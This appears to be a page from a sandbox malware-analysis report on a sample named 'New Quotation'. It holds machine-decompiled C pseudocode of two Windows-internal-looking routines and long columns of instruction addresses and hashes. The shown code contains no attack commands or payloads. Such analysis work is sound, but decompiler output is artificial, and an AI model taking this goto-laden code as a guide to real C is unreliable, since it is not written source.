                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E1D82693A(intOrPtr __ecx, signed int _a8) {
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				signed short _v32;
				char* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t79;
				intOrPtr _t80;
				intOrPtr _t85;
				intOrPtr _t86;
				char _t111;
				intOrPtr _t112;
				char* _t118;
				signed int _t127;
				signed int _t128;
				signed int _t130;
				intOrPtr _t133;
				signed short _t136;
				intOrPtr _t138;
				signed short _t139;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t150;
				char* _t152;
				signed int _t153;

				_v12 =  *0x1d8cb370 ^ _t153;
				_t128 = _a8;
				_t150 = __ecx;
				_v40 = _t128;
				_t152 = 0;
				_v52 = __ecx;
				E1D818F40(__ecx, 0, 0x34);
				_t79 =  *0x1d7a8468; // 0xa3bc7c75
				_v20 = _t79;
				_t80 =  *0x1d7a846c; // 0x418a073a
				_v16 = _t80;
				asm("sbb ebx, ebx");
				_v36 = 0;
				_push( &_v32);
				_push(_v40);
				_t130 =  ~_t128 & 0x000000c8;
				_push(_t150 + 8);
				_v32 = _t130;
				_push(0);
				_push(0);
				_push( &_v20);
				_t133 = E1D813FE0();
				_v44 = _t133;
				_t149 = 0x10;
				if(_t133 != 0) {
					L3:
					if(_t133 != 0xc0000023) {
						_t85 = _v36;
						goto L18;
					} else {
						goto L4;
					}
				} else {
					_t127 = _v40;
					if(_t127 == 0) {
						L4:
						_t118 = _v36;
						L5:
						L5:
						if(_t130 < 0xc8) {
							_t130 = 0xc8;
						}
						if(_t130 < _v32) {
							_t130 = _v32;
						}
						if(_t130 < _t149) {
							_t130 = _t149;
						}
						_t152 = 0;
						if(_t118 != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t118);
						}
						_t148 = E1D7E5D90(0xc8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t152, _t130);
						_v36 = _t148;
						if(_t148 == 0) {
							goto L16;
						}
						_v32 = _t130;
						_push( &_v32);
						_push(_t148);
						_push(_t150 + 8);
						_push(_t152);
						_push(_t152);
						_push( &_v20);
						_t133 = E1D813FE0();
						_t118 = _v36;
						_v44 = _t133;
						_t152 = _t118;
						_t149 = 0x10;
						if(_t133 == 0xc0000023) {
							goto L5;
						} else {
							L18:
							if(_t133 != 0 || _t152 == 0) {
								if(_t85 != 0) {
									E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
									_t133 = _v44;
								}
								_t86 = _t133;
							} else {
								_t149 = _v32;
								if(_t149 > 4) {
									 *((char*)(_t150 + 0xc)) =  *_t152;
								}
								_t136 = 0x10;
								if(_t149 < _t136 ||  *((char*)(_t150 + 0xc)) != 2 || ( *(_t152 + 2) & 0x0000ffff) < _t136) {
									L32:
									_v32 = _t136;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t150 = _v52;
									 *(_t152 + 2) = _t136;
									 *_t152 = 0x202;
									 *((intOrPtr*)(_t150 + 0x14)) = _t152;
									_t138 = ( *(_t152 + 2) & 0x0000ffff) + _t152;
									 *((intOrPtr*)(_t150 + 0x18)) = _t138;
									 *((intOrPtr*)(_t150 + 0x1c)) = ( *(_t152 + 4) & 0x0000ffff) * 0xc + _t138;
									goto L33;
								} else {
									if(_t149 < ( *(_t152 + 4) & 0x0000ffff) * 0xc + (( *(_t152 + 6) & 0x0000ffff) << 4) + ( *(_t152 + 2) & 0x0000ffff)) {
										_t136 = 0x10;
										goto L32;
									} else {
										_t149 = 0;
										_v40 = 0;
										if(( *(_t152 + 4) & 0x0000ffff) != 0) {
											_t111 =  *0x1d7a8460; // 0xa3bc8075
											_v28 = _t111;
											_t112 =  *0x1d7a8464; // 0x418a073a
											_v24 = _t112;
											_push( &_v48);
											_push(0);
											_v48 = 0;
											_push( &_v40);
											_push(0);
											_push(0);
											_push( &_v28);
											E1D813FE0();
											_t149 = _v40;
										}
										_t44 = _t152 + 0x10; // 0x10
										_t144 = _t44;
										 *((intOrPtr*)(_t150 + 0x14)) = _t152;
										 *((intOrPtr*)(_t150 + 0x18)) = _t144;
										 *((intOrPtr*)(_t150 + 0x1c)) = ( *(_t152 + 4) & 0x0000ffff) * 0xc + _t144;
										 *(_t150 + 0x20) = 0 | _t149 != 0x00000000;
										if( *_t152 != 2 ||  *((char*)(_t152 + 1)) >= 2) {
											L33:
											_t139 = _v32;
										} else {
											_t139 = ( *(_t152 + 4) & 0x0000ffff) * 0xc + (( *(_t152 + 6) & 0x0000ffff) << 4) + ( *(_t152 + 2) & 0x0000ffff);
											 *((intOrPtr*)(_t150 + 0x10)) = 1;
										}
									}
								}
								 *(_t150 + 0x28) = _t139;
								_t140 = _v36;
								 *((intOrPtr*)(_t150 + 0x24)) = _t152;
								if(_t140 == 0) {
									_t130 = 0xc8;
								}
								 *(_t150 + 0x2c) = _t130;
								 *(_t150 + 0x30) = 0 | _t152 == _t140;
								_t86 = 0;
							}
						}
						goto L40;
						L16:
						_t86 = 0xc000009a;
					} else {
						_t152 = _t127;
						goto L3;
					}
				}
				L40:
				return E1D814B50(_t86, _t130, _v12 ^ _t153, _t149, _t150, _t152);
			}






































                                                                                                                                                                                          0x1d826949
                                                                                                                                                                                          0x1d82694d
                                                                                                                                                                                          0x1d826954
                                                                                                                                                                                          0x1d826956
                                                                                                                                                                                          0x1d826959
                                                                                                                                                                                          0x1d82695b
                                                                                                                                                                                          0x1d826960
                                                                                                                                                                                          0x1d826965
                                                                                                                                                                                          0x1d826970
                                                                                                                                                                                          0x1d826973
                                                                                                                                                                                          0x1d82697a
                                                                                                                                                                                          0x1d826980
                                                                                                                                                                                          0x1d826982
                                                                                                                                                                                          0x1d826985
                                                                                                                                                                                          0x1d826986
                                                                                                                                                                                          0x1d826989
                                                                                                                                                                                          0x1d82698f
                                                                                                                                                                                          0x1d826992
                                                                                                                                                                                          0x1d826995
                                                                                                                                                                                          0x1d826996
                                                                                                                                                                                          0x1d82699a
                                                                                                                                                                                          0x1d8269a0
                                                                                                                                                                                          0x1d8269a2
                                                                                                                                                                                          0x1d8269a7
                                                                                                                                                                                          0x1d8269aa
                                                                                                                                                                                          0x1d8269b5
                                                                                                                                                                                          0x1d8269bb
                                                                                                                                                                                          0x1d826a44
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8269ac
                                                                                                                                                                                          0x1d8269ac
                                                                                                                                                                                          0x1d8269b1
                                                                                                                                                                                          0x1d8269c1
                                                                                                                                                                                          0x1d8269c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8269c4
                                                                                                                                                                                          0x1d8269cb
                                                                                                                                                                                          0x1d8269cd
                                                                                                                                                                                          0x1d8269cd
                                                                                                                                                                                          0x1d8269d2
                                                                                                                                                                                          0x1d8269d4
                                                                                                                                                                                          0x1d8269d4
                                                                                                                                                                                          0x1d8269d9
                                                                                                                                                                                          0x1d8269db
                                                                                                                                                                                          0x1d8269db
                                                                                                                                                                                          0x1d8269dd
                                                                                                                                                                                          0x1d8269e1
                                                                                                                                                                                          0x1d8269ee
                                                                                                                                                                                          0x1d8269ee
                                                                                                                                                                                          0x1d826a03
                                                                                                                                                                                          0x1d826a05
                                                                                                                                                                                          0x1d826a0a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826a0f
                                                                                                                                                                                          0x1d826a12
                                                                                                                                                                                          0x1d826a13
                                                                                                                                                                                          0x1d826a17
                                                                                                                                                                                          0x1d826a18
                                                                                                                                                                                          0x1d826a19
                                                                                                                                                                                          0x1d826a1d
                                                                                                                                                                                          0x1d826a23
                                                                                                                                                                                          0x1d826a25
                                                                                                                                                                                          0x1d826a28
                                                                                                                                                                                          0x1d826a2b
                                                                                                                                                                                          0x1d826a2f
                                                                                                                                                                                          0x1d826a36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826a38
                                                                                                                                                                                          0x1d826a47
                                                                                                                                                                                          0x1d826a49
                                                                                                                                                                                          0x1d826b7f
                                                                                                                                                                                          0x1d826b8d
                                                                                                                                                                                          0x1d826b92
                                                                                                                                                                                          0x1d826b92
                                                                                                                                                                                          0x1d826b95
                                                                                                                                                                                          0x1d826a57
                                                                                                                                                                                          0x1d826a57
                                                                                                                                                                                          0x1d826a5d
                                                                                                                                                                                          0x1d826a61
                                                                                                                                                                                          0x1d826a61
                                                                                                                                                                                          0x1d826a66
                                                                                                                                                                                          0x1d826a69
                                                                                                                                                                                          0x1d826b28
                                                                                                                                                                                          0x1d826b28
                                                                                                                                                                                          0x1d826b2f
                                                                                                                                                                                          0x1d826b30
                                                                                                                                                                                          0x1d826b31
                                                                                                                                                                                          0x1d826b32
                                                                                                                                                                                          0x1d826b33
                                                                                                                                                                                          0x1d826b36
                                                                                                                                                                                          0x1d826b3a
                                                                                                                                                                                          0x1d826b3f
                                                                                                                                                                                          0x1d826b46
                                                                                                                                                                                          0x1d826b48
                                                                                                                                                                                          0x1d826b54
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826a86
                                                                                                                                                                                          0x1d826a9e
                                                                                                                                                                                          0x1d826b27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826aa4
                                                                                                                                                                                          0x1d826aa8
                                                                                                                                                                                          0x1d826aaa
                                                                                                                                                                                          0x1d826ab0
                                                                                                                                                                                          0x1d826ab2
                                                                                                                                                                                          0x1d826ab7
                                                                                                                                                                                          0x1d826aba
                                                                                                                                                                                          0x1d826abf
                                                                                                                                                                                          0x1d826ac5
                                                                                                                                                                                          0x1d826ac6
                                                                                                                                                                                          0x1d826aca
                                                                                                                                                                                          0x1d826acd
                                                                                                                                                                                          0x1d826ace
                                                                                                                                                                                          0x1d826acf
                                                                                                                                                                                          0x1d826ad3
                                                                                                                                                                                          0x1d826ad4
                                                                                                                                                                                          0x1d826ad9
                                                                                                                                                                                          0x1d826ad9
                                                                                                                                                                                          0x1d826adc
                                                                                                                                                                                          0x1d826adc
                                                                                                                                                                                          0x1d826adf
                                                                                                                                                                                          0x1d826ae2
                                                                                                                                                                                          0x1d826aee
                                                                                                                                                                                          0x1d826af8
                                                                                                                                                                                          0x1d826afe
                                                                                                                                                                                          0x1d826b57
                                                                                                                                                                                          0x1d826b57
                                                                                                                                                                                          0x1d826b06
                                                                                                                                                                                          0x1d826b1a
                                                                                                                                                                                          0x1d826b1c
                                                                                                                                                                                          0x1d826b1c
                                                                                                                                                                                          0x1d826afe
                                                                                                                                                                                          0x1d826a9e
                                                                                                                                                                                          0x1d826b5a
                                                                                                                                                                                          0x1d826b5d
                                                                                                                                                                                          0x1d826b60
                                                                                                                                                                                          0x1d826b65
                                                                                                                                                                                          0x1d826b67
                                                                                                                                                                                          0x1d826b67
                                                                                                                                                                                          0x1d826b6e
                                                                                                                                                                                          0x1d826b76
                                                                                                                                                                                          0x1d826b79
                                                                                                                                                                                          0x1d826b79
                                                                                                                                                                                          0x1d826a49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d826a3a
                                                                                                                                                                                          0x1d826a3a
                                                                                                                                                                                          0x1d8269b3
                                                                                                                                                                                          0x1d8269b3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8269b3
                                                                                                                                                                                          0x1d8269b1
                                                                                                                                                                                          0x1d826b97
                                                                                                                                                                                          0x1d826ba5

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 43252d7c7b3b4ccb26f2adcd77ba0cd1dc7a74c6ab4ebcf0ad4d636070bcf840
                                                                                                                                                                                          • Instruction ID: 238a90f5a89a7b5ad719e33b9a4459a564bf6c7af263f5d3e578a0fb1df1148e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 43252d7c7b3b4ccb26f2adcd77ba0cd1dc7a74c6ab4ebcf0ad4d636070bcf840
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB81A6B1A0061A9FDB14CF69C881ABEBBF5FF48704F41852EE445E7640E734E984CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FCFB0 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E1D7FCFB0(short* _a4, signed int* _a8, intOrPtr* _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				short _v46;
				unsigned int _v48;
				char _v56;
				void* _t71;
				signed int _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				signed int _t82;
				signed int* _t84;
				char* _t93;
				signed int _t95;
				intOrPtr* _t99;
				signed int* _t104;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				short _t109;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t118;
				signed int _t125;
				signed int* _t126;
				signed int* _t127;
				signed int _t128;
				void* _t129;
				void* _t130;
				signed int _t133;
				signed int _t135;

				_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x470));
				if(_t93 == 0 ||  *_t93 == 0) {
					_t71 = E1D7FD051(_a4, _a8);
					goto L8;
				} else {
					_t133 =  *((intOrPtr*)(_t93 + 4));
					_v28 = _t133;
					asm("lock or [eax], ecx");
					_t99 = _a12;
					_t75 =  *( *[fs:0x30] + 0x474) & 0x00000001;
					_v12 = _t75;
					if(_t99 != 0) {
						_v16 =  *_t99;
						_v20 =  *((intOrPtr*)(_t99 + 4));
					} else {
						_v16 = 0;
						_v20 = 0;
					}
					if(_t75 != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						__eflags = _v48 >> 0x10 - 0x3c;
						if(_v48 >> 0x10 == 0x3c) {
							_t109 = 0x3b;
							_t82 = _t75 | 0x00000002;
							__eflags = _t82;
							_v46 = _t109;
							_v12 = _t82;
						}
						_t76 = E1D7FD051( &_v56,  &_v40);
						__eflags = _t76;
						if(_t76 == 0) {
							goto L10;
						}
						_v32 = _v32 & 0x00000000;
						_t77 = 0x989680;
						__eflags = _v28;
						_t135 = _v36;
						_t118 = _v40;
						if(_v28 <= 0) {
							L36:
							_t78 = _v12;
							L37:
							__eflags = _t78 & 0x00000002;
							if((_t78 & 0x00000002) == 0) {
								goto L7;
							}
							__eflags = _t78 - 4;
							if(_t78 < 4) {
								goto L10;
							}
							_t118 = _t118 + 0x989680;
							asm("adc esi, 0x0");
							goto L7;
						}
						_t95 = _t93 + 8;
						__eflags = _t95;
						do {
							_t105 =  *(_t95 + 4);
							_t125 =  *_t95;
							__eflags = _t105;
							if(__eflags < 0) {
								L23:
								_t106 = _t105 & 0x7fffffff;
								_t126 = _t125 - _v16;
								_v24 = _t126;
								asm("sbb ecx, [ebp-0x10]");
								_v24 = _v24 + _t77;
								asm("adc eax, 0x0");
								__eflags = _t135 - _t106;
								if(__eflags < 0) {
									L33:
									__eflags = _t135 - _t106;
									if(__eflags > 0) {
										goto L10;
									}
									if(__eflags < 0) {
										goto L36;
									}
									__eflags = _t118 - _t126;
									if(_t118 >= _t126) {
										goto L10;
									}
									goto L36;
								}
								if(__eflags > 0) {
									L26:
									_t77 = 0x989680;
									_t118 = _t118 - 0x989680;
									asm("sbb esi, 0x0");
									goto L27;
								}
								__eflags = _t118 - _v24;
								if(_t118 < _v24) {
									goto L33;
								}
								goto L26;
							}
							if(__eflags > 0) {
								L19:
								_t127 = _t125 - _v16;
								_v24 = _t127;
								asm("sbb ecx, [ebp-0x10]");
								_v24 = _v24 + _t77;
								asm("adc eax, 0x0");
								__eflags = _t135 - _t105;
								if(__eflags < 0) {
									L29:
									__eflags = _t135 - _t105;
									if(__eflags < 0) {
										goto L36;
									}
									if(__eflags > 0) {
										L32:
										_t78 = _v12 | 0x00000004;
										goto L37;
									}
									__eflags = _t118 - _t127;
									if(_t118 < _t127) {
										goto L36;
									}
									goto L32;
								}
								if(__eflags > 0) {
									L22:
									_t77 = 0x989680;
									_t118 = _t118 + 0x989680;
									asm("adc esi, 0x0");
									goto L27;
								}
								__eflags = _t118 - _v24;
								if(_t118 < _v24) {
									goto L29;
								}
								goto L22;
							}
							__eflags = _t125;
							if(_t125 < 0) {
								goto L23;
							}
							goto L19;
							L27:
							_t95 = _t95 + 8;
							_t108 = _v32 + 1;
							_v32 = _t108;
							__eflags = _t108 - _v28;
						} while (_t108 < _v28);
						goto L36;
					} else {
						if(E1D7FD051(_a4,  &_v40) == 0) {
							L10:
							_t71 = 0;
							L8:
							return _t71;
						}
						_t118 = _v40;
						_t135 = _v36;
						_v32 = 0;
						if(_t133 != 0) {
							_t84 = _t93 + 8;
							_v24 = _t84;
							do {
								_t111 = _t84[1];
								_t128 =  *_t84;
								__eflags = _t111;
								if(__eflags < 0) {
									L52:
									_t112 = _t111 & 0x7fffffff;
									_t129 = _t128 - _v16;
									asm("sbb ecx, [ebp-0x10]");
									_v12 = _t129 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t135 - _t112;
									if(__eflags < 0) {
										L58:
										__eflags = _t135 - _t112;
										if(__eflags > 0) {
											goto L10;
										}
										if(__eflags < 0) {
											goto L7;
										}
										__eflags = _t118 - _t129;
										if(_t118 >= _t129) {
											goto L10;
										}
										goto L7;
									}
									if(__eflags > 0) {
										L55:
										_t118 = _t118 - 0x989680;
										asm("sbb esi, 0x0");
										goto L56;
									}
									__eflags = _t118 - _v12;
									if(_t118 < _v12) {
										goto L58;
									}
									goto L55;
								}
								if(__eflags > 0) {
									L44:
									_t130 = _t128 - _v16;
									asm("sbb ecx, [ebp-0x10]");
									_v12 = _t130 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t135 - _t111;
									if(__eflags < 0) {
										L48:
										__eflags = _t135 - _t111;
										if(__eflags < 0) {
											goto L7;
										}
										if(__eflags > 0) {
											L51:
											_t135 = (_t135 << 0x00000020 | _t118) << 1;
											_t118 = _t118 + _t118 - _t130;
											asm("sbb esi, ecx");
											goto L56;
										}
										__eflags = _t118 - _t130;
										if(_t118 < _t130) {
											goto L7;
										}
										goto L51;
									}
									if(__eflags > 0) {
										L47:
										_t118 = _t118 + 0x989680;
										asm("adc esi, 0x0");
										goto L56;
									}
									__eflags = _t118 - _v12;
									if(_t118 < _v12) {
										goto L48;
									}
									goto L47;
								}
								__eflags = _t128;
								if(_t128 < 0) {
									goto L52;
								}
								goto L44;
								L56:
								_t114 = _v32 + 1;
								_t84 =  &(_v24[2]);
								_v32 = _t114;
								_v24 = _t84;
								__eflags = _t114 - _v28;
							} while (_t114 < _v28);
						}
						L7:
						_t104 = _a8;
						_t71 = 1;
						 *_t104 = _t118;
						_t104[1] = _t135;
						goto L8;
					}
				}
			}









































                                                                                                                                                                                          0x1d7fcfbf
                                                                                                                                                                                          0x1d7fcfc9
                                                                                                                                                                                          0x1d83ecd3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fcfd8
                                                                                                                                                                                          0x1d7fcfd8
                                                                                                                                                                                          0x1d7fcfde
                                                                                                                                                                                          0x1d7fcfe3
                                                                                                                                                                                          0x1d7fcfee
                                                                                                                                                                                          0x1d7fcff7
                                                                                                                                                                                          0x1d7fcffa
                                                                                                                                                                                          0x1d7fcfff
                                                                                                                                                                                          0x1d7fd045
                                                                                                                                                                                          0x1d7fd048
                                                                                                                                                                                          0x1d7fd001
                                                                                                                                                                                          0x1d7fd001
                                                                                                                                                                                          0x1d7fd004
                                                                                                                                                                                          0x1d7fd004
                                                                                                                                                                                          0x1d7fd009
                                                                                                                                                                                          0x1d83eb0a
                                                                                                                                                                                          0x1d83eb0b
                                                                                                                                                                                          0x1d83eb0c
                                                                                                                                                                                          0x1d83eb0d
                                                                                                                                                                                          0x1d83eb14
                                                                                                                                                                                          0x1d83eb18
                                                                                                                                                                                          0x1d83eb1c
                                                                                                                                                                                          0x1d83eb1d
                                                                                                                                                                                          0x1d83eb1d
                                                                                                                                                                                          0x1d83eb20
                                                                                                                                                                                          0x1d83eb24
                                                                                                                                                                                          0x1d83eb24
                                                                                                                                                                                          0x1d83eb2d
                                                                                                                                                                                          0x1d83eb32
                                                                                                                                                                                          0x1d83eb34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83eb3a
                                                                                                                                                                                          0x1d83eb3e
                                                                                                                                                                                          0x1d83eb43
                                                                                                                                                                                          0x1d83eb47
                                                                                                                                                                                          0x1d83eb4a
                                                                                                                                                                                          0x1d83eb4d
                                                                                                                                                                                          0x1d83ebee
                                                                                                                                                                                          0x1d83ebee
                                                                                                                                                                                          0x1d83ebf1
                                                                                                                                                                                          0x1d83ebf1
                                                                                                                                                                                          0x1d83ebf3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebf9
                                                                                                                                                                                          0x1d83ebfc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec02
                                                                                                                                                                                          0x1d83ec08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec08
                                                                                                                                                                                          0x1d83eb53
                                                                                                                                                                                          0x1d83eb53
                                                                                                                                                                                          0x1d83eb56
                                                                                                                                                                                          0x1d83eb56
                                                                                                                                                                                          0x1d83eb59
                                                                                                                                                                                          0x1d83eb5b
                                                                                                                                                                                          0x1d83eb5d
                                                                                                                                                                                          0x1d83eb8d
                                                                                                                                                                                          0x1d83eb8d
                                                                                                                                                                                          0x1d83eb93
                                                                                                                                                                                          0x1d83eb96
                                                                                                                                                                                          0x1d83eb99
                                                                                                                                                                                          0x1d83eb9c
                                                                                                                                                                                          0x1d83eba1
                                                                                                                                                                                          0x1d83eba4
                                                                                                                                                                                          0x1d83eba6
                                                                                                                                                                                          0x1d83ebdc
                                                                                                                                                                                          0x1d83ebdc
                                                                                                                                                                                          0x1d83ebde
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebe4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebe6
                                                                                                                                                                                          0x1d83ebe8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebe8
                                                                                                                                                                                          0x1d83eba8
                                                                                                                                                                                          0x1d83ebaf
                                                                                                                                                                                          0x1d83ebaf
                                                                                                                                                                                          0x1d83ebb4
                                                                                                                                                                                          0x1d83ebb6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebb6
                                                                                                                                                                                          0x1d83ebaa
                                                                                                                                                                                          0x1d83ebad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebad
                                                                                                                                                                                          0x1d83eb5f
                                                                                                                                                                                          0x1d83eb65
                                                                                                                                                                                          0x1d83eb65
                                                                                                                                                                                          0x1d83eb68
                                                                                                                                                                                          0x1d83eb6b
                                                                                                                                                                                          0x1d83eb6e
                                                                                                                                                                                          0x1d83eb73
                                                                                                                                                                                          0x1d83eb76
                                                                                                                                                                                          0x1d83eb78
                                                                                                                                                                                          0x1d83ebca
                                                                                                                                                                                          0x1d83ebca
                                                                                                                                                                                          0x1d83ebcc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebce
                                                                                                                                                                                          0x1d83ebd4
                                                                                                                                                                                          0x1d83ebd7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebd7
                                                                                                                                                                                          0x1d83ebd0
                                                                                                                                                                                          0x1d83ebd2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebd2
                                                                                                                                                                                          0x1d83eb7a
                                                                                                                                                                                          0x1d83eb81
                                                                                                                                                                                          0x1d83eb81
                                                                                                                                                                                          0x1d83eb86
                                                                                                                                                                                          0x1d83eb88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83eb88
                                                                                                                                                                                          0x1d83eb7c
                                                                                                                                                                                          0x1d83eb7f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83eb7f
                                                                                                                                                                                          0x1d83eb61
                                                                                                                                                                                          0x1d83eb63
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ebb9
                                                                                                                                                                                          0x1d83ebbc
                                                                                                                                                                                          0x1d83ebbf
                                                                                                                                                                                          0x1d83ebc0
                                                                                                                                                                                          0x1d83ebc3
                                                                                                                                                                                          0x1d83ebc3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7fd00f
                                                                                                                                                                                          0x1d7fd01c
                                                                                                                                                                                          0x1d7fd04d
                                                                                                                                                                                          0x1d7fd04d
                                                                                                                                                                                          0x1d7fd039
                                                                                                                                                                                          0x1d7fd03d
                                                                                                                                                                                          0x1d7fd03d
                                                                                                                                                                                          0x1d7fd01e
                                                                                                                                                                                          0x1d7fd023
                                                                                                                                                                                          0x1d7fd026
                                                                                                                                                                                          0x1d7fd029
                                                                                                                                                                                          0x1d83ec10
                                                                                                                                                                                          0x1d83ec18
                                                                                                                                                                                          0x1d83ec1b
                                                                                                                                                                                          0x1d83ec1b
                                                                                                                                                                                          0x1d83ec1e
                                                                                                                                                                                          0x1d83ec20
                                                                                                                                                                                          0x1d83ec22
                                                                                                                                                                                          0x1d83ec6c
                                                                                                                                                                                          0x1d83ec6c
                                                                                                                                                                                          0x1d83ec72
                                                                                                                                                                                          0x1d83ec77
                                                                                                                                                                                          0x1d83ec7c
                                                                                                                                                                                          0x1d83ec81
                                                                                                                                                                                          0x1d83ec84
                                                                                                                                                                                          0x1d83ec86
                                                                                                                                                                                          0x1d83ecb2
                                                                                                                                                                                          0x1d83ecb2
                                                                                                                                                                                          0x1d83ecb4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ecba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ecc0
                                                                                                                                                                                          0x1d83ecc2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ecc8
                                                                                                                                                                                          0x1d83ec88
                                                                                                                                                                                          0x1d83ec8f
                                                                                                                                                                                          0x1d83ec8f
                                                                                                                                                                                          0x1d83ec91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec91
                                                                                                                                                                                          0x1d83ec8a
                                                                                                                                                                                          0x1d83ec8d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec8d
                                                                                                                                                                                          0x1d83ec24
                                                                                                                                                                                          0x1d83ec2a
                                                                                                                                                                                          0x1d83ec2a
                                                                                                                                                                                          0x1d83ec2f
                                                                                                                                                                                          0x1d83ec34
                                                                                                                                                                                          0x1d83ec39
                                                                                                                                                                                          0x1d83ec3c
                                                                                                                                                                                          0x1d83ec3e
                                                                                                                                                                                          0x1d83ec4e
                                                                                                                                                                                          0x1d83ec4e
                                                                                                                                                                                          0x1d83ec50
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec56
                                                                                                                                                                                          0x1d83ec60
                                                                                                                                                                                          0x1d83ec60
                                                                                                                                                                                          0x1d83ec66
                                                                                                                                                                                          0x1d83ec68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec68
                                                                                                                                                                                          0x1d83ec58
                                                                                                                                                                                          0x1d83ec5a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec5a
                                                                                                                                                                                          0x1d83ec40
                                                                                                                                                                                          0x1d83ec47
                                                                                                                                                                                          0x1d83ec47
                                                                                                                                                                                          0x1d83ec49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83ec49
                                                                                                                                                                                          0x1d83ec42
                                                                                                                                                                                          0x1d83ec45
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
